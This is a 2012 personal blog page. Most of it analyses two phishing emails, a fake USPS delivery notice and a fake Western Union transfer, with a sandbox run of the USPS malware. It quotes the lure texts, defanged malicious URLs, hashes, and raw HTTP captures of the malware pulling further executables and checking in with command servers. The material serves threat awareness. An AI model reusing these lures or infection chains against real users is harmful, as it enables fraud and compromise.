Friday, August 31, 2012

@christoperj:

The most surprising thing to me about Clint Eastwood's speech at the RNC last night wasn't the content and delivery -- but rather that just last February he was being almost universally vilified by republican pundits about a Super Bowl car commercial which was being wrongly perceived to be an overtly "Democratic" political ad.

If these same pundits can come together to get past the political theatre of distraction and agree that reality is indeed just reality -- why can't we has a society do the same on issues that matter?

Thursday, August 30, 2012

Need to Pay Attention More

Noticed tonight that there are no stop signs on my neighborhood side streets. Wonder if they've been stolen over the years or if they were never there. Either way, I clearly need to pay attention more. . .

No, USPS Did Not Fail to Deliver a Package This Week

Started receiving alerts claiming to be from the USPS concerning a package that could not be delivered.

This is a new take on an old trick, and a 'low-budget' one at that. Whatever the case, this email is also very much malicious. My fully patched Windows 7 sandbox was quickly popped by the bug without any effort. It also did not seem to matter that the user-id was had only limited user privileges and I received no UAC approval window when it was triggered. Very disturbing.

There's no visible text in the email when displayed as HTML. But there is hidden text in the background that is probably intended to make the message appear legitimate to spam filters. The text itself appears to be pulled from 3 novels which have long since found their way into the public domain:

From "Artemus Ward (his travels) among the Mormons, Part 1" by John Camden Hotten (originally published in 1865)
. . .Sometimes they introduce a full brass and string band in Church. Brigham Young says the devil has monopolized the good music long enough, and it is high time the Lord had a portion of it. . .

From "A Fleece of Gold: Five Lessons from the Fable of Jason and Golden Fleece" by Charles Steward Given (originally published in 1905)
. . .Galen, the famous anatomist, after a prolonged study of the human hand, conceiving it to be the proximate instrument of the soul, was forced to renounce atheism, to acknowledge the existence of a Supreme Being. . .

From "The Entire PG Works by George Meredith, Volume 1 of 10" by George Meredith (originally published in 1851)
. . .Richard mechanically sat down on the crumbling flints to rest, and listened to the panting of the dog. Sprinkled at his feet were emerald lights: hundreds of glow- worms studded the dark dry ground. . .

I wonder how the original email author came upon these three distinctly different novels as even in an internet connected world, it seems unlikely that these are just the result of a "What novels should I quote to bypass spam filters?" Google search

That said, the user only sees a low quality jpg image (pulled from http://bdedieu [DOT] perso [DOT] neuf [DOT] fr/HIDVRTXUKI [DOT] jpg) when they open the message claiming that USPS failed to deliver a package. . .
USPS.COM
Unfortunately, we failed to deliver the postal package you have sent on the 27th of august in time, because the recipient's address is erroneous.

Please go to the nearest UPS office and show your shipping label.

If the parcel isn't received within 30 working days our company will have the right claim compensation from you for each day of keeping.
Low quality JPG referring to a phantom parcel
Low quality JPG referring to a phantom parcel

Not sure why I would be taking a USPS/United States Postal Service receipt to a UPS/United Parcel Service office, but whatever.

Clicking on the image sends the user to http://bdedieu [DOT] perso [DOT] neuf [DOT] fr/XREOWCDHOS [DOT] htm, which has only a very simple javascript within commanding the browser to download a file named Label_Copy_USPS [DOT] zip. . .
Javascript to download the Label_Copy_USPS file
Javascript to download the Label_Copy_USPS file

The zip file itself contains a malicious file named Label_Copy_USPS [DOT] exe, with an embeded icon that makes it look like a MSWord document to the untrained eye.
Not really a word document, no matter what it says
Not really a word document, no matter what it says
Unique File Details:
Filename -- Label_Copy_USPS [DOT] exe
File size -- 88576 bytes (86.5 KB)
Filetype -- PE32 executable for MS Windows (GUI) Intel 80386 32-bit (Win32 Executable Generic)
MD5 Hash -- 7c35f845a49f95e6797ee89073cf1d89
SHA1 Hash -- 8dc099b23270b70a42dad714a230c4b51eb06175
SHA256 Hash -- 254dd09af71c45cbad147aa523cf7f277340c1e0799fba9b36f20942f295c63d
Online malware scanners identified the file as:
AntiVir -- TR/Crypt.ZPACK.Gen
Avira -- TR/Crypt.ZPACK.Gen
Eset -- Win32/Kryptik.ALDT (Variant)
F-Prot -- W32/Falab.J6.gen!Eldorado
Kaspersky Lab -- Trojan-Downloader.Win32.Kuluoz.ar
McAfee -- Generic BackDoor.adp
Norman -- W32/Obfuscated.D!genr
Sophos -- Mal/EncPk-AGK

The file also appears to have authentic metadata information, though it could just as easily be another misdirect.
File Description: Fatal Hums 32
Company: EPoX
File Version: 2.2.0.1112
Date Created: 8/30/2012 6:57 AM
Size: 86.5 KB

Opened the file in the sandbox and confirmed it's malicious nature.

It appears to execute, but doesn't display anything but an empty document in notepad named "Label_Copy_USPS". Not sure if that's just for appearance, or if it's exploiting something in notepad on my fully patched sandbox machine.
Just an empty notepad document
Just an empty notepad document

The Label_Copy_USPS.exe file with the MSWord icon has also been replaced with an empty text file named Label_Copy_USPS.txt.

After that, nothing else. At least for a few minutes.

Then I get a popup for something called Security Monitor claiming:
Security Monitor: WARNING!

Attention! System detected a potential hazard (TrojanSPM/LX) on your computer
that may infect executable files. Your private information and PC Safety
is at risk.
To get rid of unwanted spyware and keep your computer safe you need to update your computer security software.
Click Yes to download official intrusion detection system (IDS software)
Bogus Security Monitor Warning
Bogus Security Monitor Warning

Followed by an ominous systemtray flag. . .
WARNING!
Application cannot be executed. The file notepad.exe is infected.

Please activate your antivirus software.
Bogus Infected File Flag
Bogus Infected File Flag

And then conveniently a scan from Live Security Platinum (one of the Fake Antivirus variants) which I of course didn't knowingly install. . .
Live Security Platinum (one of the Fake Antivirus variants)
Live Security Platinum (one of the Fake Antivirus variants)

I've seen these before, and it always amuses me how it claims certain applications are infected on machine (even though they are not actually installed)

But whatever the case, it throws the expected "Your machine is infected with many malicious bugs, It is highly recommended that you remove all the threats from your computer immediately" message.
Bogus Infected Machine Warning
Bogus Infected Machine Warning

And of course clicking on the button takes the user to an online website asking for a credit card number.

Basically anything that I did on the machine from this point on triggered an alert claiming that whatever application I was trying to open was infected, right after the process was terminated for my 'safety'

But that's not all that's going on. . .

Behind the scenes, this all starts with a HTTP connection on TCP84 to a Netherlands IP (93.184.100.116) and pulled down another malicious exe file named 3b0c6a8305cc89cf77f3c9616a569e78 [DOT] exe. . .
GET /d0f7718d96B962A24D5DB24495EF4073722C70A2F37B8ED45222F5F57F5006B4F30287DE5E832CD19BA0C26553344C35D1833C79DC573864758807A47C3CED5B939DECA6688F364B7F8C HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 93.184.100.116:84

HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Thu, 30 Aug 2012 20:53:14 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze13
Vary: Accept-Encoding
Content-Length: 49

c=run&u=/get/3b0c6a8305cc89cf77f3c9616a569e78 [DOT] exeGET //get/3b0c6a8305cc89cf77f3c9616a569e78 [DOT] exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
Host: 93.184.100.116:84
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Thu, 30 Aug 2012 20:53:14 GMT
Content-Type: application/x-msdos-program
Connection: keep-alive
Last-Modified: Thu, 30 Aug 2012 20:30:04 GMT
ETag: "ddc0f1-66a00-4c8818a54eb00"
Accept-Ranges: bytes
Content-Length: 420352

MZ......................@...............................................!..L.!This program cannot be run in DOS mode. [FILE CONTINUES]

And then it pulls yet another malicious file, passF [DOT] dll [DOT] crp. . .
GET /d0f7718d96B962A24D5DB24495EF4073722C70A2F37B8ED45222F5F57F5006B4F30287DE5E832CD19BA0C26553344C35D1833C79DC573864758807A47C3CED5B939DECA6688F364B7F8C HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 93.184.100.116:84

HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Thu, 30 Aug 2012 20:55:18 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze13
Vary: Accept-Encoding
Content-Length: 49

c=rdl&u=/get/passF.dll.crp&a=0&k=00005f73&n=passFGET //get/passF.dll.crp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 93.184.100.116:84

HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Thu, 30 Aug 2012 20:55:18 GMT
Content-Type: application/x-msdos-program
Connection: keep-alive
Last-Modified: Fri, 24 Aug 2012 12:47:50 GMT
ETag: "ddc0f8-1a9e00-4c80262356980"
Accept-Ranges: bytes
Content-Length: 1744384

>...p_..w_......._..s_..3_..s_..s_..s_..s_..s_..s_..s_..s_..{^..}@..s...R..L.~Th., p.0gr.2 c.1no..beS-unS6n 7.S .0de]R

W_..s_..+...oO..oO..[FILE CONTINUES]

And because that clearly wasn't enough, it connects to Hong Kong (175.41.28.156) to log itself as 'installed'. . .
GET /api/stats/install/?ts=26070510&affid=41100&ver=3060001&group=liv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent:
Host: 175.41.28.156

HTTP/1.1 200 OK
Server: nginx/1.2.3
Date: Thu, 30 Aug 2012 20:56:18 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive

Then the bug downloads silently completes a form in Kazakhstan (195.210.47.109) and downloads a spam email template. . .
POST /index.php HTTP/1.1
Host: 195.210.47.109:80:80
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 746

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sid"
0549571111555245

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="up"
13849612

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wbfl"
1

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="v"
137

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ping"
457

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="guid"
{DAB0CFA5-8A9B-4160-8DA8-8F2A01AC8EF6}

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wv"
6#2#1#0#7601#0

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sr"
0

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ar"
0

--1BEF0A57BE110FD467A--
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Aug 2012 20:56:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.3.3-7+squeeze13
Vary: Accept-Encoding
f4a

HTTP/1.1 200 OK
Date: Thu, 30 Aug 2012 20:56:29 GMT
Server: Apache/2.2.16
Content-Length: 55876
Connection: close
Content-Type: multipart/form-data; boundary="1BEF0A57BE110FD467A"

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="COMMON"; filename="COMMON.BIN"
Content-Type: application/octet-stream

'hr.%+./".,****...)/.'4hr.%.'ywtxp%.'m%.***.'4m%.'h%**/5)+)5)/,5*#)!#/.*,(5)(+5*(*5*-#!#/.*,(5##5.5(!#+.*##5*(#5".5*((!#/.)+(5*(+5*)"5.#!#/.)+"5)+5,#5)/*!#/.-#5*,(5*#)5*)#!#/.,)5..[FILE CONTINUES]

Once downloaded, the sandbox becomes a mailzombie and starts blasting the world. . .

Meanwhile. . . the bug is also trying to pull down more badness from Germany (78.159.108.83). . .
GET /ajax/libs/jquery/1.6.4/jquery [DOT] min [DOT] js HTTP/1.1
Accept: */*
Referer: http://chechoutbiz [DOT] com/p/liv/?group=liv&ver=3060001&reject_url=http%3A%2F%2Fchechoutbiz [DOT] com%3A80%2Fp%2Fdecline%2F%3Fgroup%3Dliv%26ver%3D3060001%26nid%3DD0F7718D%26affid%3D41100&nid=D0F7718D&affid=41100

Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
Connection: Keep-Alive

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/javascript; charset=UTF-8
Last-Modified: Mon, 02 Apr 2012 18:24:28 GMT
Date: Thu, 30 Aug 2012 18:41:47 GMT
Expires: Fri, 30 Aug 2013 18:41:47 GMT
X-Content-Type-Options: nosniff

Server: sffe
Content-Length: 32103
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 8101

............y..../....MD...j..v.%`C...-..K..aS.....H.Zr......SU(......}...(.j=u.:K.i.l...|....U.?{..M..M...........C.p.-..2.W...i.....U./.+?VIpo...[?.....v.:....O.*[.Q.0...j...?l.(..<[FILE CONTINUES]

And then yet another file from Missouri (209.20.78.241) via TCP84. . .
GET /d0f7718d96B962A24D5DB24495EF4073722C70A2F37280D51B2FB5E0240E44F8B14D849155C63ADBC2A2CA31 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 209.20.78.241:84

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Thu, 30 Aug 2012 21:03:11 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze13
Vary: Accept-Encoding
Content-Length: 225

..9.......Q0.r+..W..As..yP........k....mEq.v..j!...fg.@.o?.Y....|.4rh.....5^.....{.j..q.SK.q.....U..........'2.e9..IrKJe.,zSo/..o.a8_.cf.......~(MD.+.P.........f...?......M..^{Q.|.f...@.;.%Y.(.K..8PF..S..\l.%..W..v.&8a.KR....

And then back to Germany (slopokan21 [DOT] ru) to fill out another online form. . .
POST /index [DOT] php HTTP/1.1
Host: slopokan21 [DOT] ru:80
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 2936

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sid"
2505323811778201

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="up"
14097139

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wbfl"
0

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="v"
137

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ping"
457

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="guid"
{DAB0CFA5-8A9B-4160-8DA8-8F2A01AC8EF6}

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wv"
6#2#1#0#7601#29

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ms"
758019024:121:2000:0:0:0:25:0:0:0:0:0:0:0:0:0:0

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="smtx"
CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sr"
0

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ar"
0

--1BEF0A57BE110FD467A--
HTTP/1.0 303 See Other
Location: http://slopokan21 [DOT] ru:80/index [DOT] php
Content-Length: 0
Connection: close
Date: Thu, 30 Aug 2012 21:00:40 GMT

The connections and downloads continue with zero sign of stopping. And again, all of this is taking place silently behind the scenes without the user ever knowing.

Good times


Original source email (minus the HTML formatting):
Delivered-To: christoperj
Received: by 10.231.42.212 with SMTP id t20csp39528ibe;
Thu, 30 Aug 2012 09:52:10 -0700 (PDT)
Received: by 10.50.236.39 with SMTP id ur7mr1239726igc.62.1346345530047;
Thu, 30 Aug 2012 09:52:10 -0700 (PDT)
Return-Path:
Received: from mailforward. (mailforward.. [10.10.10.23])
by mx. with ESMTP id i2si3576532icy.69.2012.08.30.09.52.09;
Thu, 30 Aug 2012 09:52:10 -0700 (PDT)
Received-SPF: neutral (: 10.10.10.23 is neither permitted nor denied by best guess record for domain of www@suzan.yourwebhost [DOT] com) client-ip=10.10.10.23;
Authentication-Results: mx.; spf=neutral (: 10.10.10.23 is neither permitted nor denied by best guess record for domain of www@suzan.yourwebhost [DOT] com) smtp.mail=www@suzan.yourwebhost [DOT] com
Received: from mx1. (inbound-us1. [70.87.28.133])
by mailforward. (Postfix) with ESMTP id 72C0E162C3C6
for ; Thu, 30 Aug 2012 16:52:09 +0000 (GMT)
Received: from suzan.yourwebhost [DOT] com (suzan [DOT] yourwebhost [DOT] com [209.239.43.1])
by mx1. (Postfix) with ESMTP id 58343471681
for ; Thu, 30 Aug 2012 16:52:09 +0000 (GMT)
Received: (from www@localhost)
by suzan.yourwebhost [DOT] com (8.14.3/8.12.10) id q7UGq3Uc015428;
Thu, 30 Aug 2012 12:52:03 -0400
Date: Thu, 30 Aug 2012 12:52:03 -0400
Message-Id: <201208301652 .q7ugq3uc015428=".q7ugq3uc015428" com="com" suzan="suzan" yourwebhost="yourwebhost">
To: christoperj
Subject: Delivery refuse ID#36556
From: "USPS Customer Service"
X-Mailer: CF-XPInformer
Reply-To: "USPS Customer Service"
Mime-Version: 1.0
Content-Type:multipart/mixed;boundary="----------1346345523503F9A33361C5"
X-CTCH-Spam: Suspect
X-CTCH-VOD: Unknown
X-CTCH-RefID: str=0001.0A0B0209.503F9A39.0103,ss=2,re=0.000,recu=0.000,reip=0.000,cl=2,cld=1,fgs=0



------------1346345523503F9A33361C5


[LINK TO http://bdedieu [DOT] perso [DOT] neuf [DOT] fr/XREOWCDHOS [DOT] htm" USING IMAGE FILE POINTING TO http://bdedieu [DOT] perso.neuf [DOT] fr/HIDVRTXUKI [DOT] jpg"]

There are no ravishingly beautiful women present, and no positively ugly ones.The men are fair to middling. They will never be slain in cold blood for their beauty, nor shut up in jail for their homeliness. There are some good voices in the choir to-day, but the orchestral accompaniment is unusually slight. Sometimes they introduce a full brass and string band in Church. Brigham Young says the devil has monopolized the good music long enough, and it is high time the Lord had a portion of it. Therefore trombones are tooted on Sundays in Utah as well as on other days; and there are some splendid musicians there. The Orchestra in Brigham Youngs theatre is quite equal to any in Broadway. There is a youth in Salt Lake City (I forget his name) who plays the cornet like a North American angel. Mr. Stenhouse relieves me of any anxiety I had felt in regard to having my swan-like throat cut by the Danites, but thinks my wholesale denunciation of a people I h!
ad never seen was rather hasty.


And the plaudits of men and of angels attend the young man today who has a worthy object in view, who believes in himself, and bends to the oars with might and main.An active hand symbolizes usefulness and thrift. Has it ever occurred to you what a wonderful piece of mechanism is that hand with which Nature has equipped you for seizing the oars of lifes activities? Galen, the famous anatomist, after a prolonged study of the human hand, conceiving it to be the proximate instrument of the soul, was forced to renounce atheism, to acknowledge the existence of a Supreme Being. Scientists regard the human hand as being the most remarkable organ, not vital, in the whole animal kingdom. It is conceded to be, also, the most pronounced physical characteristic differentiating man from the lower animals. The chimpanzee and the gorilla, closely allied to the human species in many respects, are noticeably deficient in the use of their modified hands; being able to grasp things only in a c!
umbersome way.

Tongue out of mouth trotted the little dog after him; crouched panting when he stopped an instant; rose weariedly when he started afresh.Now and then a large white night-moth flitted through the dusk of the forest. On a barren corner of the wooded highland looking inland stood grey topless ruins set in nettles and rank grass-blades. Richard mechanically sat down on the crumbling flints to rest, and listened to the panting of the dog. Sprinkled at his feet were emerald lights: hundreds of glow- worms studded the dark dry ground. He sat and eyed them, thinking not at all. His energies were expended in action. He sat as a part of the ruins, and the moon turned his shadow Westward from the South. Overhead, as she declined, long ripples of silver cloud were imperceptibly stealing toward her. They were the van of a tempest. He did not observe them or the leaves beginning to chatter.




------------1346345523503F9A33361C5--

No, I Do Not Have a Confirmed Money Transfer from Western Union

Received a new version (well, received several times actually) of the old Western Union Money Transfer scam in the last 48 hours.

This latest derivative comes across as an authentic looking email from "2012, Western Union" thanking me (or more specifically, a random name that isn't actually me) for using the Western Union Money Transfer service. The email goes on to say that a credit of several hundred dollars is ready for me to pickup. All I have to do is to click on a link for the transaction details.

And as a bonus -- I have also earned Western Union Gold Points for the transaction. I like bonuses. I wonder if I can convert them to airline miles?

Regardless -- like all the versions that came before, this latest incarnation is clearly fake and appears to have been sent with malicious intent.

All of the emails appear to be an attempt to trick the reader into clicking on a variety of non-Western Union links peppered throughout the messages.

None of the links I found in the messages I received were working when I tested.

These links threw an immediate 404 --
http://www [DOT] fantallenatori [DOT] com/pUcAJCR5/index [DOT] html

http://www [DOT] fantallenatori [DOT] com/uAu1GZ1V/index [DOT] html=

http://www [DOT] fantallenatori [DOT] com/6E3eDXLg/index [DOT] html

http://quevenderparaganardinero [DOT] com/ZYbjfFiB/index [DOT] htm

http://quevenderparaganardinero [DOT] com/psdr66QH/index [DOT] html

Weirdly, this single link threw an authentication challenge from www [DOT] pictoo [DOT] de:80 --
http://www [DOT] pictoo [DOT] de/5TpLpTTy/index [DOT] html

These links attempted to redirect to http:// 69.163.40.128 /pxyk80ujzb03h [DOT] php?y=p7tqagmzf8qdjqpi (which also threw a dead 404 error from a nginx v0.7.67 server) --
http://doctorraulseveriche [DOT] com/N9SvVNHj/index [DOT] html

http://inove [DOT] imb [DOT] br/oRVx4RJW/index [DOT] html

http://6-engel [DOT] com/7KwgSTdk/index [DOT] html

http://afistan [DOT] com/TwWrw4T9/index [DOT] html

http://academiaplataforma [DOT] com [DOT] br/EsRMFkkp/index [DOT] html

But during the redirect, it threw a "WAIT PLEASE Loading. . ." message in a format I've seen previously used to send the visitor to a website serving automated exploits back to the visiting user's machine.
WAIT PLEASE Loading. . .

It's possible these 5 specific links might be working at a later time with just a simple DNS update pointing the redirect to another live host.

Good times


Screenshot of an example email:

Yep, this Western Union email is clearly fake
Yep, this Western Union email is clearly fake

Text of an example email (minus the html formatting):

Delivered-To: christoperj
Received: by 10.231.42.212 with SMTP id t20csp22737ibe;
Thu, 30 Aug 2012 05:54:32 -0700 (PDT)
Received: by 10.42.18.193 with SMTP id y1mr4641886ica.0.1346331271484;
Thu, 30 Aug 2012 05:54:31 -0700 (PDT)
Received-SPF: neutral (: 10.10.10.23 is neither permitted nor denied by domain of commerciale@eurocina.it) client-ip=10.10.10.23;
Received: by 10.64.35.42 with POP3 id e10mf1997265iej.8;
Thu, 30 Aug 2012 05:54:30 -0700 (PDT)
Return-Path:
Delivered-To:
Received: from mx1 ([10.10.10.23])
by mss-us12 (Dovecot) with LMTP id MNheK7NhP1BXIwAAkZ4h7A
for ; Thu, 30 Aug 2012 12:51:09 +0000
Received: from srv534004-1.cloud.colt-engine.it (srv534004-1.cloud.colt-engine.it [81.31.148.114])
by mx1 (Postfix) with ESMTP id 442AB4715AB
for ; Thu, 30 Aug 2012 12:51:09 +0000 (GMT)
Received: from 85-250-70-7.bb.netvision.net.il ([85.250.70.7] helo=eurocina.it)
by srv534004-1.cloud.colt-engine.it with esmtpsa (TLSv1:AES256-SHA:256)
(Exim 4.76)
(envelope-from )
id 1T74CM-0002Od-2o; Thu, 30 Aug 2012 14:50:14 +0200
Message-ID: <337f2ff7 .43d9abdf=".43d9abdf" eurocina.it="eurocina.it">
Date: Thu, 30 Aug 2012 14:50:17 +0200
Reply-To: "2012, Western Union"
From: "2012, Western Union"
X-Accept-Language: en-us
MIME-Version: 1.0
To:
Subject: Western Union: Confirmed money transfer
Content-Type: text/html;
charset="us-ascii"
Content-Transfer-Encoding: 7bit

Dear Melanie Gibb,


Thank you for using the Western Union Money Transfer service

Your money transfer has been authorized, and is now available for pick up by the receiver.




Transfers to certain destinations may be subject to further delay or additional restrictions.


TRANSACTION DETAILS:


Your Money Transfer Control Number [MTCN] is: 7741471847


Please use this number for all inquiries.


Date of Order: 08/13/2012
Time of Order: 3:25 p.m. ET
Total Amount: $200.50
Transaction Type: credit
AUTH CODE: 16985615

Selected Additional Service (s):
No Additional Services selected.

Western Union Gold Card Reward Summary
Western Union Card Number: 43566235
Points Earned: 85
Total Points: 30

Click here for transaction details [LINK TO NON-WESTERN UNION SITE]


YOU EARNED 3 MINUTES OF PHONE TIME! Your time is loaded directly on your card. Calling instructions are on the card back, or dial 888-628-8862 & enter your personal PIN: 233705064231.


You sent the funds, now make it personal!
Record a greeting with your webcam, upload a photo or send a postcard!
Send a free greeting now at http://wugreetings [DOT] com


Check if the receiver has picked up the money transfer. [LINK TO NON-WESTERN UNION SITE]


IN ADDITION TO THE TRANSFER FEE, WESTERN UNION ALSO MAKES MONEY WHEN IT CHANGES YOUR DOLLARS TO PESOS. PLEASE SEE BELOW FOR MORE INFORMATION REGARDING CURRENCY EXCHANGE.

ADEM?S DE LOS CARGOS POR EL SERVICIO DE TRANSFERENCIA, WESTERN UNION TAMBI?N GANA DINERO CUANDO CAMBIA SUS D?LARES A PESOS. POR FAVOR LEA EN LA PARTE INFERIOR M?S INFORMACI?N SOBRE EL CAMBIO DE MONEDA.

THE CURRENCY TO BE PAID OUT AND THE EXCHANGE RATE FOR YOUR TRANSACTION WERE DETERMINED AT THE TIME OF SEND IF LISTED ON YOUR RECEIPT. OTHERWISE, THE EXCHANGE RATE WILL BE SET WHEN THE RECEIVER RECEIVES THE FUNDS. PROTECT YOURSELF FROM CONSUMER FRAUD. BE CAREFUL WHEN A STRANGER ASKS YOU TO SEND MONEY. FOR A COMPLETE COPY OF THE TERMS AND CONDITIONS GOVERNING THIS TRANSACTION AND THE SERVICES YOU HAVE SELECTED PLEASE REVIEW AND PRINT THE TERMS AND CONDITIONS.[LINK TO NON-WESTERN UNION SITE]


REFUNDS. PRINCIPAL REFUNDS and cancellation of the money transfer will be made if payment to the Receiver has not been made when Western Union processes Customers written request. TRANSFER FEE REFUNDS are generally made if funds are not available to the Receiver within Western Unions specified timeframes. Qualifying refunds will be made within 45 days of receipt of Customers valid written request.


LIMITATIONS OF LIABILITY. . IN NO EVENT SHALL WESTERN UNION BE LIABLE FOR DAMAGES FOR DELAY, NONDELIVERY, NONPAYMENT OR UNDERPAYMENT OF ANY SERVICES TRANSACTION, WHETHER CAUSED BY NEGLIGENCE ON THE PART OF ITS EMPLOYEES, SUPPLIERS OR AGENTS OR OTHERWISE, BEYOND THE SUM OF $500 (in addition to refunding the principal amount and the transfer fees), UNLESS THE SENDER HAS OBTAINED A HIGHER LIABILITY LIMIT BY CALLING THE TELEPHONE NUMBER SET FORTH BELOW AND PAYING AN ADDITIONAL CHARGE THEREFOR. IN NO EVENT WILL WESTERN UNION BE LIABLE FOR ANY INDIRECT, SPECIAL, INCIDENTAL, CONSEQUENTIAL, EXEMPLARY OR PUNITIVE DAMAGES OR THE LIKE. THESE CONDITIONS CANNOT BE CHANGED OR SUPPLEMENTED ORALLY.


CURRENCY EXCHANGE. Payments will generally be in local currency (except that in certain countries payment may be in U.S. dollars or other alternate currency at participating locations). In addition to the transfer fees applicable to this transaction, a currency exchange rate will be applied. United States currency is converted to foreign currency at an
exchange rate set by Western Union. Any difference between the rate given to Customers and the rate received by Western Union will be kept by Western Union (and its Agents in some cases) in addition to the transfer fees. Please ask a customer service representative for information concerning the currency exchange rate applicable to your transaction. You may also find out
the current foreign exchange rate provided by Western Union to its customers by calling toll-free to 1-800-325-6000.

The transfer fees and the money Western Union (or its Agents) makes when it changes your dollars into foreign currency may vary based upon the payout currency that you select. Some Western Union Agents may offer receivers the choice to receive funds in a currency different from the one you selected. In such instances, Western Union (or its Agents) may make additional money when it changes your funds into the Receiver selected currency.


CAMBIO DE MONEDA. Los pagos se har?n generalmente en moneda local (excepto que en algunos pa?ses el pago puede hacerse en d?lares estadounidenses u otra moneda alternativa en lugares habilitados). Adem?s de los cargos por el servicio de transferencia establecidos para esta transacci?n, se aplicar? un tipo de cambio de moneda. Para la conversi?n de la moneda de los Estados Unidos a moneda extranjera se aplicar? el tipo de cambio determinado por Western Union. Cualquier diferencia entre el tipo de cambio ofrecido a los clientes y el tipo de cambio obtenido por Western Union, adem?s de los cargos por el servicio de transferencia, corresponder? a Western Union (y sus agentes en algunos casos). Por favor solicite el representante de servicio al cliente que le atienda informaci?n respecto al tipo de cambio de moneda que se va a aplicar a su transacci?n. Usted tambi?n puede solicitar informaci?n sobre el tipo de cambio de moneda extranjera actual que este ofreciendo Western Union a sus clientes, llamando gratuitamente al 1-800-325-4045.

